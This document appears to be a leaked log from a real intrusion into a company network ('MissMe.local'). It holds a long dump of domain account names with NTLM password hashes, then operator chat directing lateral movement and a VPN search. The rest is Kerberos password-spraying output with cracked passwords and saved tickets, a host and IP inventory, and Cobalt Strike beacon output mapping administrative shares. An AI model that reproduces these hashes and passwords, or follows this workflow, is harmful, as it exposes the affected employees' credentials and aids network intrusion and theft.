MarbelSerafin ab12067db2517fb01b3c9fbe1421b6b7 66048 3801 JillianHong 02f266f0a3a3d362391a4c441e129b89 66048 3824 HQ151$ 64d5675d0c401c336cc013ecf13c8551 4096 1778 wh 82ea11ee5c73ebdc9bb4fde2b12df244 66048 6205 HQ315$ 3254d8470d844fa5eec4aedce35d4623 4096 5926 BrittanyLovell 6e30ee1c49ceb27edcf853499f50b25e 66048 5947 LeslyPlancarte 35332e7fb780cf30fbfc29cba93d7bf2 66048 4160 HQ109$ fdb7ca77f3106f6fdb55b4abcb47ea39 4096 4204 HQ164$ 61dffd7bef7d4844eefc6725dff50e40 4096 4176 HQ133$ 61b501c8e80442e73ff80b99721a0e58 4096 1178 TonyPak 
1c3241f96515b83f74e7a277ea956532 66048 5915 JenniferChoi 68fee161b32334b8c4d69501cf8a5414 66048 5920 AhramRyu 490cf9ded21774c424116348f2215916 66048 1258 PaulOh 788b3648d74e26a7d0957ab9090f6f9a 66048 5739 GloriaHernandez ad6519dd6264b8cd233b9170956bde84 66048 5696 HQ245$ ae21c627f742c13bf010646370741592 4096 6223 hqmac066$ 3d7da7ac657a23f41d99624738978568 4096 5925 HyePark 7581ef7f434a6e75db6c7d5ec13b240c 66048 5934 AshleyChoi 678756df085a482b6dc37d3d1716cc6e 66048 1220 TimKim e0583b06baa1f40f58b6cd0c858b304b 66048 5725 SofiaSuk 8095fdaff069e7529f5d151a3304feaa 66048 5893 JulyPark 732318e15172095f7ff6fd71e2b42465 66048 5910 AriaChoe 28d670b0d2f5778c72056689f0722396 66048 5945 hqmac064$ a25e890b4d676a2631de0966235656dd 4096 5924 YoungSeo 7211ae4e73a2ebadb6abf53342cc5d10 66048 6176 HQ301$ 9acda185c7366c9f778d3be298ea601f 4096 5719 HQ261$ 98fccfa82c308baeddee8ab56c5c6b3b 4096 6199 HQ314$ 232218af45baec7a05f04c7013dbe02b 4096 5718 DarleneYoung 90ef8ad2330b735b0ee2d679fd409fc9 66048 5918 RosePark 54ceac79513faf8b8c49c255eebfca2e 66048 5747 hqmac042$ fa801a973cd68e1465340e35d1183d18 4096 5860 HanLee 6787dc7c99c6ff77e17a29e1ae5df15b 66048 6156 hqmac040$ e8e76e4080c49b5be3284377ceb0f776 4096 5964 HannahChoi 1df148b29b41024c47fe7a579eba36eb 66048 6196 hqmac054$ 8e78768d957fd8332ba37dafc4a028b9 4096 6157 HQ274$ a194161c5d36454ae0c65d44ba450ed9 4096 5632 hqmac013$ 8871078b7ad26ab2687db783e45ad7a1 4096 5620 hqmac007$ 36e96c68976f9fe8f0f5400f7d4153fd 4096 5931 ChloeSLee 45735e1130c3ffbb7a93eb4bfa9da31c 66048 3881 LoisLee eecd7b8fcc873bcaab511637c6744ac5 66048 3922 hqmac009$ 5a635d3a51aa761dca80f74be571e637 4096 3879 SaralynLoeur 35534e1a493d11d2f0cfc96bd4fb2e6d 66048 5745 HQ278$ abd7bfd0e512f1ff76eeda3af0c06920 4096 5944 RobinBae 4691a2c87c12edcd0d1bbf90964c8e66 66048 5858 HQ324$ 61cf9d70faeb9653ebaffecfc5277f04 4096 3686 AndyCha 115f4ef32315d242abe6351fff681ec8 66048 1226 TomJeon e4aded47f1af2a92a3807e7bf70dcf74 66048 3749 HQ033$ 81701208a469a697c90810f8cb9e2c90 4096 5762 
AmandaSun cba0e67baeba56702b742b82d358c9d1 66048 6143 hqmac035$ 04a761dbb7e893fd334a5e9f651681a0 4096 5865 YadiraEspinosa f537f1445562dd8587d1c8b69409871c 66048 5974 HildaMorales 468138ec7d092db58d3a8529ee9f2d4b 66050 5921 IrenePark 3cf52cdea9a036efa0b642da4c19c950 66048 3615 MEGACOM a103a33e9e358a8e5eddc67a7c00e31e 66048 6165 HQ284$ ef69274644c4fde88694bc5e5b279696 4096 7110 HQ323$ 16f8e1f6d49c463e5e2e4ee1e35d2505 4096 6180 hqmac044$ 6bfb6396b0b845c6efa24f29e1f2ec21 4096 1153 EuniceLee 09126272831b72ba18d67f00b033a090 66048 5690 HQ242$ d4a2a3892784c304582d3bba4b199de6 4096 3928 hqmac017$ dc537791ddc56ad815cfba5b0b2baedb 4096 7111 HQ321$ ba72ab25f2f40496792a204e09de8da8 4096 5853 hqmac053$ e5f5111ff177574f743a5de6960bbea1 4096 6204 HQBARTENDER$ e048208bd591b3dc6816fed497e9ba64 4096 4195 HQ153$ c16c76a28fa0e484ba164a2cb85780e7 4096 4255 hqmac018$ 78c159e8016cb592a18e4b0c4f176b61 4096 5657 BrendaPerez dc769f15e6c1c5cdb3974278d29a6d6b 66048 5966 JaniceAhn e8003cea07e597b8f3f125fa1b41ef78 66048 5980 ChristinaPaik aa5d8328edf37916fba36fdce62fe2b5 66048 5936 KPNWH019-THO$ 7c56d2e9353d443d56afb459eca32cf4 4096 3646 ThomasChang f5fecc2c183cea4c2a6537af2b3dd5c6 66048 5975 XiomaraMartinez 4ead53958976d4983b676f4fb4386286 66048 4179 HQ136$ f0d00d4b3e67139441acdf98b4ac2348 4096 5968 TiffanyChoi f702fc7ed5dc3318366c3ff250efc797 66048 5837 kpnmac015$ 06e2815239f004ffa6c0c36736469de2 4096 6158 hqmac039$ 9618175177e6e6c08b03cd001521fd26 4096 4194 HQ148$ 2d55fbb28a582b77f3e49cf5e22a8972 4096 5842 KPNWH018$ 40e7ede02068c0c58d4898115bd81fa3 4096 5671 HQ235$ 7a11d9ed2b22f7ea11d6ccc0f2890a8d 4096 5943 MarieFabon c8bc2265426005ab7556a7bd85afea6d 66048 5669 HQ233$ 91892b5fd58897c1a686e1cd002c9238 4096 2112 HQ034$ 04c669c95c000c1361ee7b8f46b27e04 4096 5716 hqmac031$ a80bc5e01342a7487539f8e10940e842 4096 4239 HQ215$ cee70e744f18fd733844d8f83a9919ee 4096 6159 HQ275$ c0618f4f8cac792ac79f353423cd7db7 4096 5857 SHIPWORKS$ 8c1cde679f4219aafbffa1f99d0131a6 4096 4211 HQ177$ 
b05468a7a9daae868ebbda2c8590c622 4096 3768 HQ019$ 1e562edeae94f17e083f3c03f9587653 4096 5650 HQ228$ db27412310dae67c002a4aa88d45bec 4096 5758 HQ290$ 85ea06b1182f76be7ce5b96ea7f2b71f 4096 5885 MijiLee 8ac9585bea45991dc0ddc22fad131b67 66048 5852 MattShouse 0a1541b4648611c94f16712ce5e8a573 66048 6177 HQ302$ d9d6a328015f7f96ea3845aaef3f8052 4096 3897 HQ198$ f6e3cd706e32f7029f8ec3dd9f6a3678 4096 5933 missme$ 48ebc8b5e8dc978acffc0749e446437b 4096 5727 HQ265$ 07392311ff58205222e706dea27ba1b3 4096 5710 HQ257$ ceeac64261add7bb7e586805059a9f8c 4096 5828 KPNSR001$ df95d1dac933081941e9ccc5cadbc80f 4096 6186 KPNWH004$ d207e08d77344910ba45287ef7ea4660 4096 6134 HQ251$ f7d734e68493a49e1b51b465419a3b70 4096 3871 HQ181$ 6e3f9cc77d47e3f36f7207ead5bb89ec 4096 5782 HQ307$ 79f98fe4b328a13d32fe3c7b6762463f 4096 6120 HQ237$ 3334476f9723547be8246620fa2af30 4096 4249 hqmac005$ 694df55b012b70483e5f6aa4dd9dc055 4096 5757 HQ289$ 3d485df280e8afd4e07ce1905eccb927 4096 5979 hqmac072$ f12d0778a9d35f0c33a64f986b87b7c3 4096 4237 HQ210$ d051f928f646096b28a67df13c64ab50 4096 5889 JennySong f1eaf3801fb8d9a15c4fc93662711b22 66048 5967 HelenLee dec52846e9de22502810496416082e3c 66048 6137 HQ255$ 7e586c0b00b5bdccb6a0b022f84f0c32 4096 5987 HQ333$ e6f642d7ce10d539ef755f6d2f1a3ae8 4096 6162 HQ280$ bb61e601d0fe8ee8daa7588b355748a7 4096 5776 HQ305$ 8fe6178495cfb1f7e826c0f79abbe952 4096 4175 HQ131$ fd313cc9854784602017aa880cdfd97b 4096 6141 HQT007$ f461a726da4ba1a1e2ca267c889458a40 4096 6129 HQT004$ 5b41bcfc89e10d705b85f189aee9d249 4096 5682 HQT001$ f56c2969382ff9d2f15da32eab0610fb 4096 7124 HQT017$ bb502db77d89e3150fb941684bc2d630 4096 6200 HQT013$ d866a8207447ca9c0d5851be5e4fd26c 4096 5951 JiaeByun 392a6704b514051ee5fd925468c123e9 66048 5913 HQ317$ dc1a89ad80d719ec6252a13fd9066a2f 4096 5832 KPNSR005$ beea7ef7848f07b44d38444976d08681 4096 5994 HQ347$ 523f26291f886be54955163254657b56 4096 4190 HQ147$ a89f92de015f0bf9e903d3c6f38a3359 4096 5992 MimiLee a5dea1b541557ea63479fd6db79eb3bf 66048 5932 MeganKwon 
e8bcbeb2609fb5bc4cee0c320d5d14b2 66048 5977 RebeccaLee 16c4de54df6c370c3ee3ee3c26cab2f44 66048 6233 hqmac076$ 2cbb01b6820e6e33e4346798ff171d80 4096 5996 hqmac077$ 6e98824884610526e327076ced356e3d 4096 5911 IreneChoi fe50752bd5ea22a41a8aca01605e5818 66048 7112 hqmac60$ 37c647663187204ca7f6af033a4ed036 4096 5997 AllyHwang 28e2381b78cd1f750bfd502770aa6d63 66048 5957 YoungSeoYoun cb0f379ff689c2049efea57e82decec3c3 66048 5720 HQ262$ 88d23bb14ce9c662abc465ea5cb6d4bc 4096 5972 MiaLee 4cb72457d7aead4b390e798236ee9f8f 66048 6001 JoanneChang 60a1a91e44c2994c65f5ad08f867f8f9 66048 6002 HQ350$ 1bbbbc4e24fff56a27105eeb85490212 4096 5962 JayLee 47dc939c82aabe6185337b2075f56366 66048 6232 hqmac075$ 9afab07e095b165a85261b197ff375e1 4096 5831 KPNSR004$ 877ef1fdc9bf31e97b583bb73829d890 4096 5956 hqmac067$ cb55a0058fc2d2556ad5efc88cdb150c 4096 5998 JulieJKim 67ef8e3089d79c3cfc56363c0767846e 66050 5999 GiannaHan 764c1b2a51fecdf23656d7b78ac3838d 66050 1888 JoycePichay 7021809fae14591171379c87abe3a09c 66048 4250 hqmac011$ 05b519668e1bd5fdba45fc24cfadfc64 4096 5976 VioletLee 8d6750e6885239a28090f7555d4d7408 66048 6174 HQ297$ 0d4ab0d8287a13f71d8d1385ba5b2470 4096 5978 hqmac069$ 7a138280c7333ac88bf91e9e236f6e34 4096 6206 HQ318$ ebe67d5cb748c77171548325ce41713a 4096 6195 HQ311$ 438ab27716f6839ca1c4001a9d5c615f 4096 5973 JaneHwang 16d2605bfd8fd431b8ad3455a8876487 66048 5960 SolMoon 741782aa3c54acf9dcc035d345029f6b 66048 6151 HQ270$ c1844a03f37131cf2a55f28870d38db9 4096 5986 HQ328$ 7be6270a63cbfd874a61912318bab12d 4096 6169 HQ292$ da21c38e4767c6f2935dfc5c192bb72b 4096 6003 hqmac078$ 8bf9b916299ec7fbc4e9024bf4b74b0e 4096 5993 HQ346$ 9a6aa33c0326b29fc82e9f958235f69e 4096 5850 KatieLee $6fdf732687167ac4eae608f3f019b6ce 66048 5982 AshleyKim f7313c6b794f3e1411428727a8594cab 66048 5961 PatrickCho 065fcddae05a85a09856cef3e3b3ca3f 66048 6203 KPNWH020$ 5c75a458b5b4e4238a9e666bd5876824 4096 5859 TerryAhn 7ee9b86a12cf3605e1d616daeac5315f 66048 7120 hqmac073$ c91809bb9031755c78855f6afd64f5a2 4096 5969 
DanaeHudspeth 44e0474ade49166e21cf2884c670fa5b 66048 3898 ChrisLee 5c1760eb00e981c4839d2b023053561b 66048 6148 COMMITCRM1$ 6aa3781e7d9d32e7213a877932790dff 4096 5830 KPNSR003$ 55f32f682cec5880ebc90bdf65024b41 4096 5984 JarymHerrera f87942fecf2a4a41081a2c18a36c6295 66048 6225 HQ326$ 250f987e5f174cf9f29f08f46ff4403d 4096 5774 GeorgeLiu c4d3b3ad003ab161f50c2687007e1146 66048 5963 HQ406$ 479fb7f5c9c21b7f0cd3d2db0e9696e8 4096 3854 HQ166$ 191d99af1939ea6362f545309d1c5ab2 4096 7127 HQ348$ 4342faf39aba45e849f09a9d9d4d269c 4096 5809 SHOWROOM 44764b991113fc2dd4da7beff159de1d 66048 6161 HQ279$ a717786a67bf0b6e1856eff7da9ae9dc 4096 7116 HQ338$ 707cfcbb448aa7c7eb7cfdb12a0dafc 4096 5922 SamanthaJ e1cc6ce0a064332108cae4e3284ba3a1 66048 5912 BrayanAldana 37dce76fa4c57293581e7a41a38a5401 66048 3754 SharonBong 37dce76fa4c57293581e7a41a38a5401 66048 5941 MelissaOlmos 37dce76fa4c57293581e7a41a38a5401 66048 5611 ClaudiaSantos 37dce76fa4c57293581e7a41a38a5401 66048 4238 MariaGonzales 37dce76fa4c57293581e7a41a38a5401 66048 1180 EloisaBelen 37dce76fa4c57293581e7a41a38a5401 66048 7118 hqmac071$ 5e57f6973e3b398ff0d3ef0734123c70 4096 3900 HQ201$ 66e7f9eeee0c0f6c64d841dcec8ba7dd53 4096 5919 HQ320$ bb8d89fd01d7473ba504e7fc55c0cdaa 4096 6224 hqmac068$ 9e2ed9c0efba90650132bc02ca5f94c1 4096 5946 JohnPichay$ f145353b69b79efc28b89f69ab39253b 66048 4212 HQ176$ bbbbaf61aeb9fb72243819676ab0caaa 4096 6226 HQ327$ 9a57f40423ee3add95c3da8ab3dff031 4096 5755 HQ287$ e958e88f563a69cb1991c8034177a1be 4096 5740 AriannaReyes c1c8b7bd9ff6cb0a3c0f23943701c8d4 66048 5753 DavidRomero 27b231b4cce49e80381b8a14bb607f70 66050 3878 AaronAustin ce11ad444873c39a4da68eab8dcfe051 66050 5948 YobannyCarrillo 83b6abbd4397691cf704f1649b65a4ec 66050 5950 ElenaCoronel 6bcf0ea16fcf3c7696f00df673d7845b 66048 5709 HQ256$ 863517aa1ea3c7fbe84ddf474748119a 4096 5654 VerenisseGuerra 2483b43c5931681a70c5e7a3e80da049 66048 5703 HQ249$ a6870af793b6ae9167f277362cb51471 4096 5824 LuisH 94afb219138c226cf0f024b1ad7511af 66048 5928 hqmac063$ 
deb31687054536e9b57630ac437511f8 4096 3648 TommyPham 88855d786540490e0ae98ce82e2540fb 66048 3647 TomNguyen ed63e8cbbff2a38ee7fdf900ff46c3b1 66048 5811 JiHong 37dce76fa4c57293581e7a41a38a5401 66048 1519 KhiemNguyen 0073dc4646f80cc53db9a45b670efac1 66048 4232 HQ202$ d80bdda8068dbe1122230619211ad84a 4096 5935 KarinnaCarrillo a79b387b3b68697aeb21d2a5b3e72bdf 66048 5990 HQT016$ b5e2e94d55afff5a4da3694fec2ed6dd 4096 3827 JohnSihn $ 223fa401514d210c4f7f478ca52c3af7 66048 6230 HQ340$ 1eee99c3fe36c904f5d9444b8aa4120f 4096 5781 EmmaKang b671b1ebd4d7c6ef0143b181a80014d8 66048 5688 HQT002$ 6e059c547894c88509902255220b569d 4096 5954 JuneLee 83a304ac699aac600415344c1fb86d50 66048 5841 hqmac050$ 620af5e72df8728e8272365f79afc2a0 4096 6130 hqmac028s-mac-p$ 83db12f343401ad62230c75aecd944c6 4096 3645 MikeKang 2c66a6dfc5d1c9ae81d518d6cac94c42 66048 4231 HQ200$ 30ba804494e4c1a6e3ef8957f16484bf 4096 3818 HQ150$ 552735f1c8390d3e0243a82b3d5ef503 4096 6175 HQ300$ ccddf13314a2ea3944fa5fe2d6938344 4096 6179 HQ303$ d8992b6961bf35d9039f6e3557fe097f 4096 4215 HQ182$ fde1ac53a781583e7204d872d1beaf29 4096 5614 HQ214$ 0331682c92919ad8b4d8d3b951847b98 4096 6207 HQ319$ c110a4d1ecec196bf92c2d6ae8f532aa 4096 6155 HQ273$ 50c55261802561c1c4f4e1aaff29a05e 4096 3914 HQ211$ f508c9ec5d35077e250e8d354eff63ae 4096 5952 marketingfs$ 74345d8b0eca80393973efca9cfc5fc0bc 4096 2623 NickKim 37dce76fa4c57293581e7a41a38a38a5401 66048 5995 HQ349$ 486f7b0494f1bfd065afd4d7783db1d 4096 5715 HQ259$ efa396b13862d06846f5ab7947a56f0a 4096 5677 FrontDesk 6b74b0f0e48512d9a79751c09d730561 66048 6170 HQ293$ 22a00f3430f1b7d05e3ba773f66bc9f0 4096 5655 KirstenSchunk 7d456c2ef878d5cb304b7668663e37a0 66048 5870 ServerAdmin2$ 16e192f6c5c6fec6ffecc970778d071c 4096 5871 MediaAdmin2$ 525e28ca7c04babe51c42890a1149e21 4096 3815 Support 5278ba05e0216f75691d352f5b784ede 66048 5991 HQT015$ c9c78e1b28b708cd1b4705a4cddadc1e 4096 3707 AndyKim 7798b8d7a39009e65953bb40c7d56ed9 66048 5892 SunnyHa f4e7caf58243e81e9a7d8d9124cf0207 66048 5937 YejinKoo 
1cff0a01b617074ba9bfe3f53441b92e 66048 3907 AndyP 1bb77d3c5f72b908eb3804c07def1618 66048 6184 ServerAdmin$ 5822ac060c4a9bcd6ad7c21aa7e43423 4096 5795 MediaAdmin$ 83ee6c0d61bea61725fb5048f07fb96b 4096 6202 RCRV-FS$ ac29b1a0c484e31e5334f136d24ec0df 4096 5886 LilianaLopez b879b7cb4cbb09c723181b1b759a9499 66048 6222 HANNAH-HP$ 0bf72a7b5db2743686d9ffdb47cd20ee 4096 500 Administrator 525ac36bc21379f88c1e675a9ed17aa4 66048 5827 JenniferLee efa257a651ec633d84d1608ae7331a4d 66048 6217 HQ404$ 6a5d1a357f7010cc2f86bfda767da312 4096 5894 HQ316$ 84b9a36a6c277c44f512ec17f66fb38d 4096 7125 HQT018$ a2898fd77f9fddb5f7df207d7d98c62c 4096 4184 QB-SVR$ fd55b7d1ab285e4d63faceda43a5b733 4096 2103 YongCKim$ 1023c9be3dd03b565ef16dbf0dbdfb9a 66048 6209 HQ601$ a5f33b14626618c4a9835ccf346ef5ed 4096 5971 MiraryHerrera $6443cc2b5980541bb58601a31bb532e3 66048 6190 KPNWH015$ 0d04a07c8a49b9cde7cc0af23355db45 4096 7115 HQ329$ 2e1d0e1addc2612e3b17696b878e0693 4096 3839 CindyLy 241f8b9bed7ae8c896b5dcab7cc05174 66048 3759 HQ125$ 588e8afe2bac19c331f197e56d5186a3 4096 5988 HQ334$ 9261074ba683fe267b98077c139de12e 4096 6227 HQ330$ 5d2c866114bbf66f53e5213e6ea73a7a 4096 1151 PatriciaChoi dc19cc56a7cc71f38fb3470c605d7a97 66048 1748 FSalgado 8dbe6c368310428b2decccd068f4ac2c 66048 3803 ArnoldChoi 1e6915c4c446d5bdc1d074f1a3f7bfe2 66048 3887 HQ190$ bbc74eff78132e3804a9625a5c38e633 4096 6218 hqmac61$ 2774419f529cc5f39623f3e38c079c15 4096 5640 RocioReyes 77f938451cbee5e6adb3523fbe83d209 66048 1208 ElbertPak d0f7e7e0b6502f02c2bfff79056ea8ae 66048 5808 EdwardP 05bcd65ffd75d0a6bac27c211b29fcc3 66048 5812 RayKim 14e04863170204b9ed58f3f68cbe3eeb 66048 6201 HQT014$ 3b220da511f30e7d68e5433b1ae7c411 4096 6164 HQ282$ ab4de9e53a3b16a2bb908ddd1a065bd8 4096 5773 freddysantos b23e3089694f258622f1093c8ef90565 66048 5959 dnm-wh 8c805e63d0e3010b108c6e4762c5eb24 66048 5989 HQ335$ e595d488a08cf7b6559310fff298c20d 4096 6005 JulissaRamirez daa6e3dfb01abc97a09bfb209afa752b 66048 3795 DanaPark e2384df3a18e7f7dea93ae240918d698 66048 
5797 ServerAdmin1$ 63678414af4d2be869fba9d3b0c1db77 4096 6185 MediaAdmin1$ 1d1d8f2c2d86caa2290be44f6b7b2dd8 4096 6116 UPS-FEDEX$ 0616cfd90b8b9ce132b24695f19ae2e2 4096 4187 MMSP-SVR$ 87977d3547221bd674d890cd763374c4 4096 6198 HQT011$ 7751e2a9baf15c156b4d17e35df21c33 4096 1242 AndyHuh $2029262f3731bcd3cb3bfdc65cbea656 66048 4173 HQ126$ 2b11a3bb042630eb175e0aa1e0c13c0e 4096 3906 SarahLee f1a4a411a749258a66cb98d2e843b7fd 66048 1184 KellyLee 309d0c06d02c3d1f38950b504ccc6089 66048 6211 HQ602$ 644751b0ed8ce95f3bf6430757a260f4 4096 5110 MM-DC1$ 26553c3f340329abb95592d3e0d7bec51 532480 7114 HQ325$ 18a601f9998fd7e573a97307eaacf919 4096 3859 MM-LIB$ e8e851fc91f5b09550ef3f823af80d38 4096 5764 JayRoberts$ ca0c0e91a43000944c3ec9e62edd251c 66048 6181 HQ306$ 01cc749e8af7e26a90a964f1095c0855 4096 5699 CelineNguyen 287e22b7def56c27f0c53164fdb00722 66048 5642 MM-DC2$ aa4c035cafc5ffb8612d883d7bc73aa3 532480 5759 Thomas f21e58ada2fe53f0457409cbe57f2174 66048 5744 HQ276$ 9eb34226a5813bfe1fdc5b4bd5083378 4096 3872 DianeTran 44dc3f1327d938875f205efc2c23284f 66048 1147 soohkim 41ba0ab5e2ac0824285ff0aac6130910 66048 5949 LauraChung 9b32b16ff20799564c57f1c98dff2524 66048 6197 HQ312$ c688e1ba7b13c7a45175c8469d1f3f89 4096 5663 HQ231$ e8ff86989cebc6358149c93d36c84814 4096 5958 DNM-WH$ 2c37d24237754b06084beaed562c833f 4096 6219 hqmac062$ ba22b48cf144630a1114d16b3050e197 4096 5983 JulieKim 3741a798f458dfc2d5b234fb42ff9173 66048 6210 HQ402$ e6dc4e1105c293f0896a51d629c0f1c1 4096 5783 KPN-FS$ 0a9945a61b5b99777846bfb315f4df32 4096 6183 MM-FS$ 89f8238b56f40b93e7b5fa4154ed5cac 4096 6216 HQ401$ 1745af25bb9f82a9470529f441506c9c 4096 6004 HQ352$ 6910db81331ea71fa15557aedf6d74ac 4096 5796 MCPC$ 5c532af7d098fe037268049e5d8c59f3 4096 1164 YounHKim 8b8ebb0eb3bbd00d544848638fb020eb 66048 5938 MM-DC3$ 4c515e93ca1e690a62d44a7998b54047 532480 7123 HQ343$ a7ef6ce0235047e7d268cd9102fc2529 4096 4244 JoanPark 7aa43a27415ccb9d76590690f51a1719 66048 5848 HQ308$ 78fdb7fe0d8b3cd7b780388a5db6e217 4096 6228 HQ331$ 
36b12b8caf4005fa05281b5b16b4592c 4096 6229 H332$ 77bbe127fc5ed6d8789da8a323acbd4e 4096 7117 HQ337$ 3c52a7027ca5d3624fa229af953407c8 4096 6221 HQ405$ 9d4659bd94a56c84573fe8479ccdc4c7 4096 4251 HQ217$ 96243fb134b7e226293c82fbc161c1e0 4096 3641 MichaelLee 970e74a2676eeb2266923f7576ae117b 66048 5615 ErnestoMoreno e04273f3b5746cb1b3326dbfbca86ac2 66048 6234 HQ351$ 4f553e073e189afe720166707df130b7 4096 5667 brandonsantana ccccda3163fd1105e0ab85885e4750b3 66048 2377 ClaudiaM 15e69ae664ccbeb4c4e6ee737e32ec6e 66048 3616 JulieKang 57e030c6654985cda6706bca1d1875e3 66048 6118 HQ232$ c20f2ce2eb7ab572797ef2dab3e9e9b3 4096 7122 HQ342$ 8639910bc25999db8dbd830090a759ed 4096 7121 HQ341$ d490e89f419113f1a358f46718c8fcb5 4096 6220 HQ603$ ab000455c06b8c84c9ecd3ce2d673d4a 4096 5883 photostudio$ d6bf74d6249997a2da21e22a5f7713c5 4096 6167 HQ288$ a0591cead4829dfb7e9f2ac528329992 4096 6142 HQ266$ 94068730c46037dbfff0cfc464177896 4096 3698 ChristineCha b0b21cf400db4e1eb1e37f39bab659f9 66048 5767 HQ299$ d6e3060e2eb0d0ef6f34eb5132626977 4096 5766 HQ298$ 2d65d2bd6109067bb5397ccbedc2624d 4096 6231 HQ345$ 7e27942b86419b84b48e11d3f7727fbf 4096 7119 HQ339$ 9de3abad1d08b6dbb22bf7208e240454 4096 2250 LisaKim 5fe115116139af2f9c8997f052c924ed 66048 7126 hqmac074$ 25e5db2f84c3fa0e020cbd420cb3a7a9 4096 1143 StellaCho f2f1bb29e892c1bcc50dca5862740cd8 66048 7113 hqmac070$ 65b79d127724f7796a96167f256d285b 4096 5965 NatalieSanchez a5d4f7118b63436c727bd6f7b4093a40 66048 1241 JenniferSuk 8497dc374396f9197798df4997a106d1 66048 2551 LeahKoh 1490979b7d44da96cac220bd273cb924 66048 6173 HQ296$ 9b8edb20af349aefe879ebd4908d4e78 4096 5927 HQ403$ f336f7408f1b0c270896e4303e020578 4096 5805 KellyCho a247481db51c56b3f7933dfa00d048dc 66048 ``No session? for now yes, @tl1 will now see what can be run while@tl1 @tl2 We have all sessions down - help the second team? 
`` [+] received output: [+] STUPENDOUS => wendy:0204 [*] Saved TGT into wendy.kirbi [+] received output: [+] STUPENDOUS => tele:0484 [*] Saved TGT into tele.kirbi [+] received output: [+] STUPENDOUS => jen:1225 [*] Saved TGT into jen.kirbi [+] received output: [+] STUPENDOUS => FL1:1602 [*] Saved TGT into FL1.kirbi [+] STUPENDOUS => FL2:1602 [*] Saved TGT into FL2.kirbi [+] received output: [+] STUPENDOUS => jody:3346 [*] Saved TGT into jody.kirbi [+] received output: [+] STUPENDOUS => Ted:4194 [*] Saved TGT into Ted.kirbi [+] received output: [+] STUPENDOUS => tony:4321 [*] Saved TGT into tony.kirbi [+] received output: [+] STUPENDOUS => rmg:4372 [*] Saved TGT into rmg.kirbi ``user9 gave out @user1 @user3 dedicates, still separately give out something useful or not ? https://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02эхххх, none of the passwords worked ( ``` ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [+] Valid user => Administrator [+] Valid user => telemkt [+] Valid user => jen [+] Valid user => barb [+] Valid user => jody [+] Valid user => wendy [+] Valid user => jon [+] Valid user => louis [+] Valid user => frontdesk [+] Valid user => linux [+] Valid user => micro [+] Valid user => tele [+] Valid user => micro2 [+] Valid user => Spare [+] received output: [+] Valid user => Gretta [+] Valid user => FL1 [+] Valid user => PAC [+] Valid user => mtsi [+] Valid user => Ted [+] Valid user => srivera [+] Valid user => mhorgan [+] Valid user => rmg [+] Valid user => zztest [+] Valid user => louisold [+] Valid user => tony [+] Valid user => FL2 [-] Blocked/Disabled user => Guest [-] Blocked/Disabled user => krbtgt [-] Done: No credentials were discovered :'( `````` Server Name IP Address ----------- ---------- 2K12SERVER 192.168.168.10 PPCCOMP 192.168.168.50 SUE-PC 192.168.168.68 COMPUTER-1 192.168.168.62 TELEMARKET 192.168.168.62 
JODY-PC 192.168.168.56
WENDY-PC 192.168.168.55
JONM-PC 192.168.168.50
DAN-HP 192.168.168.67
FRONTDESK 192.168.168.54
PKG-102 192.168.168.63
PKG-100 192.168.168.240
PKG-101 192.168.168.70
TONY-PC 192.168.168.51
[+] received output:
TELEMARKETING-H unknown
TIMECLOCKSQL 192.168.168.15
HP-TONY 172.16.200.1
BARBARA-HP-2019 192.168.168.66
SALES2-HP-2019 192.168.168.53
SALES1-HP-2019 192.168.168.73
TED-LAPTOP 192.168.168.71
``
Write a brief report in general: what have you done here, what are you going to do, what data was obtained.
Is it a local admin too? :space_invader:
niVisitedvcm?)
The old session is there.
Session is gone?
And the config; take a look around on their workstations.
Any VPN? You can look in admin_users for who is in VPN / Remote groups or the like; if they are there, there will be an additional task: find the VPN.
Not necessarily opening every PC in a row in the cob; you can look at the FS through net use, or under the token.
YES (accesses above)
1. done.
missme.com
okaido arms by the way does not immediately get to the rest?
Have all the servers been checked?
machines: 344, of them servers: 10 (9 alive, 1 unavailable), Windows machines: 256 (49 alive), 53 shares found
```5311```
Status Local Remote Network
-------------------------------------------------------------------------------
OK S: \\HQ352.MissMe.local\D$ Microsoft Windows Network
OK T: \\Hannah-HP.MissMe.local\EmailFS Microsoft Windows Network
OK U: \\H332.MissMe.local\D$ Microsoft Windows Network
Disconnected V: \\192.168.1.169\C$ Microsoft Windows Network
Disconnected W: \\192.168.1.209\C$ Microsoft Windows Network
Disconnected X: \\192.168.1.21\C$ Microsoft Windows Network
Disconnected Y: \\192.168.1.71$ Microsoft Windows Network
Disconnected Z: \\192.168.1.186$ Microsoft Windows Network
```
```
-------------------------------------------------------------------------------
OK X: \\DNM-WH.MissMe.local\Users Microsoft Windows Network
OK Y: \\Hannah-HP.MissMe.local\B$ Microsoft Windows Network
OK Z: \\HQ325.MissMe.local\J$ Microsoft Windows Network
The command completed successfully.
```
```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK O: \\HQ405.MissMe.local\Users Microsoft Windows Network
OK P: \\HQ405.MissMe.local\UPS Microsoft Windows Network
OK Q: \\HQ405.MissMe.local\Public Microsoft Windows Network
OK R: \\HQ405.MissMe.local\F$ Microsoft Windows Network
OK S: \\HQ405.MissMe.local\A$ Microsoft Windows Network
OK T: \\MMSP-SVR.MissMe.local\InstallCD Microsoft Windows Network
OK U: \\MMSP-SVR.MissMe.local\E$ Microsoft Windows Network
OK V: \\HQ603.MissMe.local\E$ Microsoft Windows Network
OK W: \\HQ312.MissMe.local\D$ Microsoft Windows Network
Unavailable X: \\192.168.1.138\C$ Microsoft Windows Network
Unavailable Y: \\192.168.1.175\C$ Microsoft Windows Network
Unavailable Z: \\192.168.1.183\C$ Microsoft Windows Network
The command completed successfully.
```
```
Status Local Remote Network
-------------------------------------------------------------------------------
OK Q: \\HQ325.MissMe.local\H$ Microsoft Windows Network
OK R: \\HQ325.MissMe.local\G$ Microsoft Windows Network
OK S: \\HQ325.MissMe.local\F$ Microsoft Windows Network
OK T: \\HQ325.MissMe.local\D$ Microsoft Windows Network
OK U: \\DNM-WH.MissMe.local\D$ Microsoft Windows Network
OK V: \\192.168.1.47\c$ Microsoft Windows Network
OK W: \\192.168.3.51\c$ Microsoft Windows Network
OK X: \\192.168.1.74\c$ Microsoft Windows Network
OK Y: \\192.168.1.35\c$ Microsoft Windows Network
